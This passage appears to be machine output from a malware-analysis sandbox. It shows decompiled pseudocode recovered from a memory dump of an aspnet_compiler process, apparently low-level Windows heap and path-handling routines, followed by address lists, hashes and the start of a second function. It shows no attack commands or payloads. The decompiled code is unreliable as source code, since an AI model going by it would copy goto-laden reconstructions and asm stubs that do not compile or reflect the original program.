						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x13360e8;
								if( *0x13360e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x13360e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01289710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01286DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0128F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0128F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0128F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0128FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0128FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0128F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0128F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01314CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0129D130(_t427, _t494, _t511);
				}
			}

0x01315ba5
0x01315baa
0x01315baf
0x01315bb4
0x01315bb6
0x01315bbc
0x01315bbe
0x01315bc4
0x01315bcd
0x01315bd3
0x01315bd6
0x01315bdc
0x01315be0
0x01315be3
0x01315beb
0x01315bf2
0x01315bf8
0x01315bfe
0x01315c04
0x01315c0e
0x01315c18
0x01315c1f
0x01315c25
0x01315c2a
0x01315c2c
0x01315c32
0x01315c3a
0x01315c3f
0x01315c42
0x01315c48
0x01315c5b
0x01315c5b
0x01315c2c
0x01315cb7
0x01315cb9
0x01315cbf
0x01315cc2
0x01315cca
0x01315ccb
0x01315ccb
0x01315cd1
0x01315cd7
0x01315cda
0x01315ce1
0x01315ce4
0x01315ce7
0x01315ced
0x01315cf3
0x01315cf9
0x01315cff
0x01315d08
0x01315d0a
0x01315d0e
0x01315d10
0x00000000
0x00000000
0x01315d16
0x01315d1a
0x00000000
0x00000000
0x01315d20
0x01315d22
0x01315d25
0x01315d2f
0x01315d2f
0x01315d33
0x01315d3d
0x01315d49
0x01315d4b
0x00000000
0x00000000
0x01315d5a
0x01315d5d
0x01315d60
0x00000000
0x00000000
0x01315d66
0x01315d69
0x00000000
0x00000000
0x01315d6f
0x01315d6f
0x01315d73
0x01315d79
0x01315d7f
0x01315d86
0x01315d95
0x01315d98
0x01315dba
0x01315dcb
0x01315dce
0x01315dd3
0x01315dd6
0x01315dd8
0x01315de6
0x01315dec
0x01315dee
0x01315df1
0x01315df3
0x0131635a
0x0131635a
0x00000000
0x0131635a
0x01315dfe
0x01315e02
0x01315e05
0x01315e07
0x01315e10
0x01315e13
0x01315e1b
0x01315e1c
0x01315e21
0x01315e22
0x01315e23
0x01315e25
0x01315e2a
0x01315e2c
0x01315e2e
0x01315e36
0x01315e39
0x01315e42
0x01315e47
0x01315e4d
0x01315e54
0x01315e54
0x01315e54
0x01315e2e
0x01315e5c
0x01315e5f
0x01315e62
0x01315e64
0x01315e6b
0x01315e70
0x01315e7a
0x01315e7a
0x01315e7a
0x01315e6b
0x01315e7e
0x01315e7f
0x01315e7f
0x01315e81
0x01315e87
0x01315e8b
0x01315e8c
0x01315e8c
0x01315e8c
0x01315e9a
0x01315e9c
0x01315ea2
0x01315ea6
0x01315f50
0x01315f50
0x01315f57
0x01315f66
0x01315f66
0x01315f66
0x01315f68
0x01315f6a
0x013163d0
0x00000000
0x01315f70
0x01315f70
0x01315f91
0x01315f9c
0x01315f9e
0x01315fa4
0x01315fa6
0x0131638c
0x01316392
0x013163a1
0x013163a7
0x013163af
0x013163af
0x013163bd
0x013163d8
0x00000000
0x013163d8
0x01315fac
0x01315fb2
0x01315fb4
0x01315fbd
0x01315fc6
0x01315fce
0x01315fd4
0x01315fdc
0x01315fec
0x01315fed
0x01315fee
0x01315fef
0x01315ff9
0x01315ffa
0x01315ffb
0x01315ffc
0x01316000
0x01316004
0x01316012
0x01316012
0x01316018
0x01316019
0x0131601a
0x0131601b
0x0131601c
0x01316020
0x01316059
0x0131605c
0x01316061
0x01316061
0x01316022
0x01316022
0x01316022
0x01316025
0x0131602a
0x0131602b
0x01316031
0x01316037
0x01316038
0x0131603e
0x01316048
0x01316049
0x0131604a
0x0131604b
0x0131604c
0x0131604d
0x01316053
0x01316054
0x01316054
0x01316062
0x01316065
0x01316067
0x0131606a
0x01316070
0x01316075
0x01316076
0x01316081
0x01316087
0x01316095
0x01316099
0x0131609e
0x013160a4
0x013160ae
0x013160b0
0x013160b3
0x013160b6
0x013160b8
0x013160ba
0x013160ba
0x013160ba
0x013160ba
0x013160be
0x013160c0
0x013160c5
0x013160c5
0x013160c5
0x013160c6
0x013160cd
0x01316114
0x013160cf
0x013160cf
0x013160d4
0x013160d5
0x013160da
0x013160db
0x013160e1
0x013160e2
0x013160e8
0x013160f8
0x013160fd
0x013160fe
0x01316102
0x01316104
0x01316107
0x01316109
0x0131610b
0x0131610b
0x0131610b
0x0131610b
0x0131610f
0x0131610f
0x01316117
0x0131611a
0x0131611f
0x01316125
0x01316134
0x01316139
0x0131613f
0x01316146
0x01316148
0x0131614b
0x0131614d
0x0131614f
0x0131614f
0x0131614f
0x0131614f
0x01316153
0x01316159
0x01316159
0x0131615c
0x01316163
0x01316169
0x0131616c
0x01316172
0x01316181
0x01316186
0x01316187
0x0131618b
0x01316191
0x01316195
0x013161a3
0x013161bb
0x013161c0
0x013161c3
0x013161cc
0x013161d0
0x013161dc
0x013161de
0x013161e1
0x013161e4
0x013161e6
0x013161e8
0x013161e8
0x013161e8
0x013161e8
0x013161e6
0x013161ec
0x013161f3
0x01316203
0x01316209
0x0131620a
0x01316216
0x0131621d
0x01316227
0x01316241
0x01316246
0x0131624c
0x01316257
0x01316259
0x0131625c
0x0131625e
0x01316260
0x01316260
0x01316260
0x01316260
0x0131625e
0x01316264
0x01316267
0x01316269
0x01316315
0x01316315
0x0131631b
0x0131631e
0x01316324
0x01316327
0x0131632f
0x01316330
0x01316333
0x0131633a
0x0131633c
0x01316335
0x01316335
0x01316335
0x0131633f
0x01316342
0x0131634c
0x01316352
0x01316355
0x01316355
0x01316359
0x00000000
0x0131626f
0x01316275
0x01316275
0x01316278
0x0131627e
0x0131627e
0x01316281
0x01316287
0x0131628d
0x01316298
0x0131629c
0x013162a2
0x0131629e
0x0131629e
0x0131629e
0x013162a7
0x013162a7
0x013162aa
0x013162b0
0x013162f0
0x013162f0
0x013162f2
0x013162f8
0x013162fd
0x013162b2
0x013162b2
0x013162b2
0x013162b5
0x013162dd
0x013162e2
0x013162e5
0x013162b7
0x013162b8
0x013162bb
0x013162bd
0x013162c0
0x013162c4
0x013162cd
0x013162cd
0x013162c0
0x013162bb
0x013162b5
0x01316302
0x01316303
0x01316305
0x01316305
0x01316305
0x0131630c
0x0131630c
0x00000000
0x0131627e
0x01316269
0x01315eac
0x01315ebb
0x01315ebe
0x01315ecb
0x01315ecb
0x01315ece
0x01315ece
0x01315ed4
0x01315ed7
0x01315ed9
0x01315edb
0x01315edb
0x01315ee1
0x01315ee1
0x01315ee3
0x01315f20
0x01315f20
0x01315ee5
0x01315ee5
0x01315ee5
0x01315ee8
0x01315f11
0x01315f18
0x01315eea
0x01315eea
0x01315eed
0x01315ef2
0x01315ef8
0x01315efb
0x01315f0a
0x01315f0a
0x01315eed
0x01315ee8
0x01315f22
0x01315f28
0x00000000
0x00000000
0x01315f30
0x01315f31
0x01315f37
0x01315f3a
0x01315f3d
0x01315f44
0x00000000
0x00000000
0x00000000
0x01315f46
0x01315f48
0x01315f4d
0x00000000
0x01315f4d
0x01315dda
0x01315ddf
0x00000000
0x01315ddf
0x01315dd8
0x01315da7
0x01315da9
0x01315dac
0x01315dae
0x00000000
0x01315db4
0x01315db4
0x00000000
0x01315db4
0x01315dae
0x01315d88
0x01315d8d
0x01316363
0x01316369
0x0131636a
0x01316370
0x01316372
0x0131637a
0x0131637b
0x0131637d
0x00000000
0x00000000
0x0131637f
0x01316385
0x00000000
0x01316385
0x01315d38
0x01315d3b
0x00000000
0x00000000
0x00000000
0x01315d3b
0x01315d27
0x01315d29
0x00000000
0x00000000
0x00000000
0x01316360
0x00000000
0x01316360
0x01315c10
0x01315c10
0x013163da
0x013163e5
0x013163e5

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ecb58df5f7a4d8f74e875cf44eeb47a0ddf3b704573d75a9a75ae9ebd539f30
Instruction ID: e8efd2500ec86f2397a80fd069ba0e9e6b52b923d42028453892653946479ace
Opcode Fuzzy Hash: 1ecb58df5f7a4d8f74e875cf44eeb47a0ddf3b704573d75a9a75ae9ebd539f30
Instruction Fuzzy Hash: D7427DB5D10229CFDB24CF68C881BA9BBB1FF45308F1481AAD94DEB256D7709A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01264120 Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E01264120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x133d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0127F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01266E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01264620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E01266E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M012645F8))) {
												case 0:
													_v568 = 0x1221078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x12211c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
